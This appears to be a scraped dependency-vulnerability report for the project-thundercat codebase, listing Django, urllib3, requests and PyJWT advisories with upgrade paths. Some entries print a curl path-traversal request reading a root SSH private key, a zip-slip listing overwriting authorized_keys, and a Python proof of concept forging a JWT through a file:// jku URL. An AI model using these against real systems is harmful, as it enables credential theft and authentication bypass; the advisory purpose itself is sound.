Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the {% debug %} template tag. The tag doesn't properly encode the current context, outputting unescaped context variables.

Details

Types of attacks

There are a few methods by which XSS can be manipulated:

Type	Origin	Description
Stored	Server	The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link.
Reflected	Server	The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser.
DOM-based	Client	The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.
Mutated		The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.

Affected environments

The following environments are susceptible to an XSS attack:

Web servers
Application servers
Web application environments

How to prevent

This section describes the top best practices designed to specifically protect your code:

Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
Convert special characters such as ?, &, /, <, > and spaces to their respective HTML or URL encoded equivalents.
Give users the option to disable client-side scripts.
Redirect invalid requests.
Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.

Remediation

Upgrade django to version 2.2.27, 3.2.12, 4.0.2 or higher.

References

Cross-site Scripting (XSS) vulnerability report

medium severity

Information Exposure Through Sent Data

Vulnerable module: urllib3
Introduced through: urllib3@1.24.3, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › urllib3@1.24.3

Remediation: Upgrade to urllib3@1.26.18.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Information Exposure Through Sent Data when it processes HTTP redirects with a 303 status code, due to not stripping the request body when changing the request method from POST to GET. An attacker can potentially expose sensitive information by compromising the origin service and redirecting requests to a malicious peer.

Note:

This is only exploitable if sensitive information is being submitted in the HTTP request body and the origin service is compromised, starting to redirect using 303 to a malicious peer or the redirected-to service becomes compromised.

Workaround

This vulnerability can be mitigated by disabling redirects for services that are not expected to respond with redirects, or disabling automatic redirects and manually handling 303 redirects by stripping the HTTP request body.

Remediation

Upgrade urllib3 to version 1.26.18, 2.0.7 or higher.

References

Information Exposure Through Sent Data vulnerability report

medium severity

Insecure Temporary File

Vulnerable module: requests
Introduced through: requests@2.21.0, coreapi@2.3.3 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0

Remediation: Upgrade to requests@2.33.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0

Overview

Affected versions of this package are vulnerable to Insecure Temporary File via the extract_zipped_paths function. An attacker can leverage unauthorized file replacement by pre-creating a malicious file in the system's temporary directory prior to extraction.

Note: Only applications that call extract_zipped_paths() directly are impacted.

Workaround

This vulnerability can be mitigated by setting the TMPDIR environment variable to a directory with restricted write access.

Remediation

Upgrade requests to version 2.33.0 or higher.

References

Insecure Temporary File vulnerability report

medium severity

MPL-2.0 license

Module: certifi
Introduced through: certifi@2019.3.9, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › certifi@2019.3.9
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › certifi@2019.3.9
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › certifi@2019.3.9

MPL-2.0 license

MPL-2.0 license vulnerability report

medium severity

LGPL-2.1 license

Module: chardet
Introduced through: chardet@3.0.4, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › chardet@3.0.4
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › chardet@3.0.4
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › chardet@3.0.4
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › chardet@3.0.4
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › chardet@3.0.4
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › chardet@3.0.4

LGPL-2.1 license

LGPL-2.1 license vulnerability report

medium severity

LGPL-3.0 license

Module: psycopg2-binary
Introduced through: psycopg2-binary@2.8.2

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › psycopg2-binary@2.8.2

LGPL-3.0 license

LGPL-3.0 license vulnerability report

low severity

Directory Traversal

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.26.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Directory Traversal via Storage.save().

Note: this is exploitable only if crafted file names are being directly passed to the save function..

Details

Directory Traversal vulnerabilities can be generally divided into two types:

Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade Django to version 2.2.26, 3.2.11, 4.0.1 or higher.

References

Directory Traversal vulnerability report

low severity

Information Exposure

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.26.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Information Exposure via the dictsort template filter, when leveraging the Django Template Language's variable resolution logic by supplying a maliciously crafted key.

Note: all untrusted user input should be validated before use.

Remediation

Upgrade Django to version 2.2.26, 3.2.11, 4.0.1 or higher.

References

Information Exposure vulnerability report

low severity

Directory Traversal

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.21.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Directory Traversal. MultiPartParser, UploadedFile, and FieldFile allow directory-traversal via uploaded files with suitably crafted file names.

Details

Directory Traversal vulnerabilities can be generally divided into two types:

Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade Django to version 2.2.21, 3.1.9, 3.2.1 or higher.

References

Directory Traversal vulnerability report

low severity

Directory Traversal

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.18.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Directory Traversal via the django.utils.archive.extract() function, which is used by startapp --template and startproject --template. This can happen via an archive with absolute paths or relative paths with dot segments.

Details

Directory Traversal vulnerabilities can be generally divided into two types:

Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade Django to version 2.2.18, 3.0.12, 3.1.6 or higher.

References

Directory Traversal vulnerability report

low severity

Cross-site Scripting (XSS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.1.9.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). The clickable Current URL value displayed by the AdminURLFieldWidget displays the provided value without validating it as a safe URL. Thus, an unvalidated value stored in the database, or a value provided as a URL query parameter payload, could result in an clickable JavaScript link.

Details

Remediation

Upgrade Django to version 1.11.21, 2.1.9, 2.2.2 or higher.

References

Cross-site Scripting (XSS) vulnerability report

low severity

new

Cleartext Transmission of Sensitive Information

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@5.2.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Cleartext Transmission of Sensitive Information in the EmailBackend function when a failed STARTTLS handshake occurs and fail_silently=True is set. An attacker can intercept and read email content by performing a man-in-the-middle attack on the network connection.

Remediation

Upgrade django to version 5.2.15, 6.0.6 or higher.

References

Cleartext Transmission of Sensitive Information vulnerability report

low severity

new

Improper Handling of Case Sensitivity

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@5.2.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to improper handling of Cache-Control directives in UpdateCacheMiddleware. An attacker can gain unauthorized access to sensitive response data by sending requests with uppercase or mixed-case Cache-Control values, causing private data to be cached and subsequently served to other users.

Remediation

Upgrade django to version 5.2.15, 6.0.6 or higher.

References

Improper Handling of Case Sensitivity vulnerability report

low severity

new

Improper Verification of Cryptographic Signature

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@5.2.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature in the get_signed_cookie function. An attacker can access data intended for a different context by crafting distinct (name, salt) pairs that result in the same concatenated value.

Remediation

Upgrade django to version 5.2.15, 6.0.6 or higher.

References

Improper Verification of Cryptographic Signature vulnerability report

low severity

new

Incomplete Comparison with Missing Factors

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@5.2.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Incomplete Comparison with Missing Factors in the has_vary_header function. An attacker can gain access to cached responses intended for other users by sending requests with whitespace-padded Vary header values.

Remediation

Upgrade django to version 5.2.15, 6.0.6 or higher.

References

Incomplete Comparison with Missing Factors vulnerability report

low severity

new

Use of Cache Containing Sensitive Information

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@5.2.15.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Use of Cache Containing Sensitive Information in the UpdateCacheMiddleware function. An attacker can access sensitive cached data by making unauthenticated requests to endpoints that have previously been accessed with an Authorization header, due to the absence of the Authorization value in the Vary response header.

Remediation

Upgrade django to version 5.2.15, 6.0.6 or higher.

References

Use of Cache Containing Sensitive Information vulnerability report

low severity

new

Unintended Proxy or Intermediary ('Confused Deputy')

Vulnerable module: pyjwt
Introduced through: pyjwt@1.7.1, djangorestframework-jwt@1.11.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › pyjwt@1.7.1

Remediation: Upgrade to pyjwt@2.13.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-jwt@1.11.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-jwt@1.11.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › pyjwt@1.7.1

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Unintended Proxy or Intermediary ('Confused Deputy') via the uri parameter being passed directly to urllib.request.urlopen, which allows fetching resources using unsupported schemes such as file, ftp, and data. An attacker can access arbitrary local files or external resources and potentially forge tokens by supplying crafted URLs.

Note:

This is only exploitable if the application's jku URL ingestion path accepts attacker-controlled URLs.

PoC

import jwt as pyjwt
from jwt import PyJWKClient
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import json, base64, time

# Attacker generates keypair (no relation to real IdP)
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
pub_n = key.public_key().public_numbers().n

def b64u(n):
    bl = (n.bit_length() + 7) // 8
    return base64.urlsafe_b64encode(n.to_bytes(bl, 'big')).rstrip(b'=').decode()

# Attacker writes JWK Set containing their public key to /tmp
jwks = {"keys":[{"kty":"RSA","kid":"attacker","use":"sig","alg":"RS256",
                  "n":b64u(pub_n),"e":"AQAB"}]}
with open("/tmp/attacker.json","w") as f:
    json.dump(jwks, f)

# Attacker mints token signed with their private key, jku=file://
priv_pem = key.private_bytes(serialization.Encoding.PEM,
    serialization.PrivateFormat.PKCS8, serialization.NoEncryption())
now = int(time.time())
token = pyjwt.encode(
    {"sub":"attacker","aud":"target-app","iat":now,"exp":now+3600},
    priv_pem, algorithm="RS256",
    headers={"kid":"attacker","jku":"file:///tmp/attacker.json","typ":"JWT"})

# Vulnerable application pattern: caller derives jku from token header
# and passes to PyJWKClient without scheme validation
header = pyjwt.get_unverified_header(token)
client = PyJWKClient(header["jku"])      # <-- accepts file:// silently
key_obj = client.get_signing_key_from_jwt(token)
decoded = pyjwt.decode(token, key_obj.key, algorithms=["RS256"],
                       audience="target-app")
print("Token verified:", decoded)
# Output: Token verified: {'sub': 'attacker', 'aud': 'target-app', ...}

Remediation

Upgrade pyjwt to version 2.13.0 or higher.

References

Unintended Proxy or Intermediary ('Confused Deputy') vulnerability report

Vulnerabilities

Dependencies

Source

Find, fix and prevent vulnerabilities in your code.

critical severity

Improper Following of a Certificate's Chain of Trust

Detailed paths

Overview

Remediation

References

critical severity

SQL Injection

Detailed paths

Overview

Remediation

References

critical severity

SQL Injection

Detailed paths

Overview

Remediation

References

critical severity

SQL Injection

Detailed paths

Overview

Remediation

References

critical severity

SQL Injection

Detailed paths

Overview

Remediation

References

critical severity

SQL Injection

Detailed paths

Overview

Remediation

References

high severity

Allocation of Resources Without Limits or Throttling

Detailed paths

Overview

Workaround

Details

Remediation

References

high severity

Improper Handling of Highly Compressed Data (Data Amplification)

Detailed paths

Overview

Details

Remediation

References

high severity

Improper Handling of Highly Compressed Data (Data Amplification)

Detailed paths

Overview

Workaround

Remediation

References

high severity new

Improper Authentication

Detailed paths

Overview

PoC

Remediation

References

high severity

Allocation of Resources Without Limits or Throttling

Detailed paths

Overview

Remediation

References

high severity

Inefficient Algorithmic Complexity

Detailed paths

Overview

Details

high severity

new

high severity

new